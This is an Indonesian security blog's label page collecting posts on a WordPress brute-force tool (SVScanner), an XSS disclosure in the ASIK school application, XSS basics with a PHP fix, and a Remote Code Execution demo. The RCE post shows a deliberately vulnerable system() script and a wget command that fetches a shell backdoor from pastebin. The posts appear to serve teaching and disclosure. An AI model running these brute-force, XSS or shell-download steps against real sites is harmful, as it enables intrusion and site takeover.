Tampilkan postingan dengan label Bug. Tampilkan semua postingan
Tampilkan postingan dengan label Bug. Tampilkan semua postingan
Tutorial BruteForce Wordpress dengan SVScanner Penetration Testing Tools - Setelah kemarin saya membagikan SVScanner Application Web Penetration Testing Tools dan sekarang saya akah memberikan tutorial pertama yaitu Tutorial BruteForce Wordpress dengan SVScanner Penetration Testing Tools dengan mudah.

Dengan tools ini kita tidak perlu susah untuk mengetahui username pada wordpress tersebut, karena username bisa didapatkan di tools SVScanner, woww hebat bukan? dan ohiya sebenarnya ini bukan BruteForce full wordlist, tapi hanya BruteForce Default Admin hehehe, tapi mungkin nanti saya akan rombak sedikit supaya bisa dengan Big Wordlist.


  • Jika belum memiliki tools SVScanner silahkan klik disini.

  • Lakukan sebelum eksekusi.
[ ! ] Masukan link pada target.txt yang berada di directory TargetList.

  • Brute Force Step
  1. ketik, php svscanner.php.
  2. ketik, 2 ( untuk menjalankan WordPress Attack Default Admin ).
  3. Threads, Enter the list number, Delete duplicate data ?, Total Request samakan dengan gambar diatas.
  4. Tunggu sampai proses Brute selesai.
  5. Jika sudah selesai akan seperti dibawah, namu saya gagal karena wordlist kurang josss hehehe, nanti akan saya share big wordlistnya.
Sekian saja, saya tidak bertanggung jawab atas apa yang kalian lakukan karena saya hanya ingin berbagi ilmu dan tolong gunakan secara bijak.
XSS Vulnerability pada Web ASIK (Aplikasi Sistem Informasi Kelulusan) - Hallo gaess dah lama nih enggak update artikel disini, kali ini saya bakal share Vulnerability/Kerentanan XSS (Cross Site Scripting) pada aplikasi ASIK (Aplikasi Sistem Informasi Kelulusan), Perlu anda ketahui ASIK bukan CMS melainkan aplikasi.

Sudah lama saya pengen share bug ini tapi baru sekarang aja inget buat update artikel disini, Bagaimana bug XSS bisa terjadi di aplikasi ASIK? XSS tersebut terjadi karena kurangnya filter pada aplikasi sehingga bisa menjalankan XSS (Cross Site Scripting).

Payload :

  • <script>alert("XSS");</script>


Langsung aja stepnya.


  1. Buka aplikasi/web ASIK.
  2. Klik "Hubungi Kami" nanti akan masuk ke halaman yg berisi form contact, url https://site.sch.id/index.php?page=contact
  3. Isi form tersebut seperti berikut, Nama Lengkap : "tes"; Email : "tes@tes.tes; Pesan : "payload".
  4.  Lalu klik "Kirim Pesan".
  5. Buka url https://site.sch.id/admin/hubungi.php.
  6. Jika payload berhasil akan muncul Alert "XSS".
Sekian saja artikel dari saya semoga bermanfaat, tolong gunakan ilmu ini dengan baik kamu bisa memberitahu webdev sekolah kamu jika web sekolah kamu menggunakan aplikasi ini.


Naufal Ardhani - Di postingan sebelumnya saya sudah membuat artikel Pengertian XSS bagi yang belom tau apa itu XSS silahkan dibaca, Bagi seorang Web Developer sangat penting mengetahui hal seperti ini supaya keamanan websitenya terjaga dan kali ini saya akan memberikan contoh script  bagaimana terjadinya bug XSS dan cara mengatasi bug XSS.

Payload :

  • <script>alert(1)</script>
  • <script>alert("XSS!!!")</script>


Bagaimana XSS bisa terjadi? cek dibawah


Sebelum lanjut membaca siapkan terlebih dahulu localhost anda untuk menjalankan script XSS,

<?php 
   $url = $_GET["kata"]; 
   echo $url; 
?>


Script diatas merupakan script XSS yang terjadi pada url dan ini sangat simple tidak ada HTML ataupun CSS karena hanya untuk belajar saja hehe.


Simpan script xss dengan nama xss.php dan silahkan hidupkan localhost anda lalu buka script xss,

  • http://localhost:8888/xss.php (dihalaman ini kosong hehe)
  • dan untuk memunculkan text pada halaman tersebut anda tinggal tambahkan parameter ?kata= dan isinya, contoh : http://localhost:8888/xss.php?kata=naufalardhani.com ganti text berwarna biru dengan payload.
Nah itu adalah 2 hasil payload yang saya gunakan.

Lanjut kita bahas cara menambal bug XSS.

  • Tambahkan htmlspecialchars() seperti dibawah agar html tidak dapat berjalan dengan sempurna.
<?php 
   $url = $_GET["kata"]; 
   echo htmlspecialchars($url); 
?>


  • Lalu kita save dan jalankan.

Berhasil! script html sudah tidak berjalan karena sudah di filter dengan htmlspecialchars().


Terimakasih telah membaca Contoh Script Bug XSS dan Tutorial Patch Bug XSS di blog saya, semoga bermanfaat :)

Jika ada yang tidak dipahami silahkan tanya saja di kolom komentar.


Naufal Ardhani - Cross Site Scripting XSS adalah salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Mengapa Cross Site Scripting disingkat XSS bukannya CSS? Karna Singkatan CSS sudah digunakan untuk cascade style sheet.


Bingung script XSS seperti apa? silahkan lihat DISINI.

Tipe XSS
  • Reflected
  • Stored


Reflected XSS
Reflected XSS merupakan tipe XSS yang paling umum dan yang paling mudah dilakukan oleh penyerang. Penyerang menggunakan social engineering agar tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang bisa mendapatkan cookie pengguna yang bisa digunakan selanjutnya untuk membajak session pengguna.

Mekanisme pertahanan menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data apapun yang di-generate oleh pengguna. Jangan percayai apapun data yang dikirim oleh pengguna.

Contoh penyerangan menggunakan XSS (Nama – nama yang saya pakai merupakan karangan) :

1. Toni sering mengunjungi website jack, yang di website tersebut memungkinkan toni untuk memasukan username/password dan menyimpan data pribadi atau data transaksi yang seharusnya tidak boleh diketahui orang lain.

2. Rey mengetahui bahwa toni sering mengunjungi web tersebut, dan lalu mengamati jika di website buatan Jack terdapat kerentanan atau celah yang bisa diserang menggunakan xss

3. Rey lalu mengekplore dan mencoba mencari celahnya dan membuat script berbahaya dan kemudian di embed atau dimasukan ke dalam sbuah URL

4. Rey lalu mengirim email ke toni yang berisi link ke halaman web jack yang sebenernya urlnya sudah di embed script yang berbahaya tersebut, serta merayunya dengan alasan palsu atau sejenisnya.

5. saat Toni click URL tersebut maka toni akan masuk ke dalam website jack serta script yang sudah rey buat akan dijalankan, sehingga rey bisa mengmbil data dari cookienya dan bisa memanfaatkanya.


Stored XSS
Stored XSS lebih jarang ditemui dan dampak serangannya lebih besar. Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali. Contohnya adalah pada message board, buku tamu, dll. Penyerang memasukkan kode HTML atau client script code lainnya pada posting mereka.


Sekian saja artikel yang tentang pengertian XSS semoga ada dapat memahami dengan mudah dan jangan lupa berkomentar dibawah.

Referensi :
https://upyes.wordpress.com/2013/05/18/pengertian-xss/
https://en.wikipedia.org/wiki/Cross-site_scripting
Naufal Ardhani - Hallo gaes dah lama nih engga update artikel diblog ini karna gasempet buat nulis waktunya keambil terus sama kegiatan lain hehe , Kali ini Saya akan membahas sebuah metode yang bernama Remote Code Execution atau biasa disebut RCE.



Mungkin anda belum tau lebih jelas metode ini Apa itu Remote Code Execution? dan Bagaimana Remote Code Execution itu bekerja? silahkan simak ya ada dibawah jawabannya.



  • Apa itu Remote Code Execution?

Remote Code Execution merupakan bug dimana sang attacker mempunyai kemampuan untuk mengeksekusi perintah di mesin target, biasanya memanfaatkan kelemahan aplikasi yang dijadikan target eksploitasi, memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.


  • Bagaimana Remote Code Execution itu bekerja?

Script PHP Remote Code Execution sederhana :
<?php echo "RemoteCodeExecution | www.naufalardhani.com<br><br><br>"; $cmd=$_GET['action']; echo "Command : " . $cmd . "<br><br>"; system($cmd); ?>
Script diatas merupakan contoh script yang rentan pada PHP, Sesimple itu kah susunan script Remote Code Execution? yaps benar masalahnya ada di system($command),
Ini akan menjalankan fungsi yang berhubungan dengan sistem.

Disini saya sudah mengupload script Remote Code Execution ke localhost dengan nama tools.php sebagai contoh target dan saya akan mempraktekan bagaimana sang Attacker melakukan Remote Code Execution pada sistem,

  1. Saya membuka link http://localhost:8888/tools.php ( contoh target )
  2. Dan saya menambahkan ?action= setelah http://localhost:8888/tools.php untuk melakukan Remote Code Execution, jadi seperti berikut linknya http://localhost:8888/tools.php?action= dan saya mencoba menjalankan command ls untuk melihat isi directory, http://localhost:8888/tools.php?action=ls dan terdapat 1 folder dan 3 file.
  3. Lalu sang Attacker mencoba memanggil Shell Backdoor RESET dengan command wget, seperti ini commandnya "wget linkshell -O namafile.php", http://localhost:8888/tools.php?action=wget https://pastebin.com/raw/**** -O reset.php
  4. lalu kita cek Shellnya, http://localhost:8888/reset.php
Nahh sudah terupload shellnya :)

Sampai disini saja artikel kali ini semoga bermanfaat bagi kalian semua dan jika ada kesalahan dalam penulisan artikel ini mohon di maklumi karna saya sebagai penulis juga masih belajar.

Request artikel / Mengoreksi kesalahan dalam artikel? silahkan isi di kolom komentar.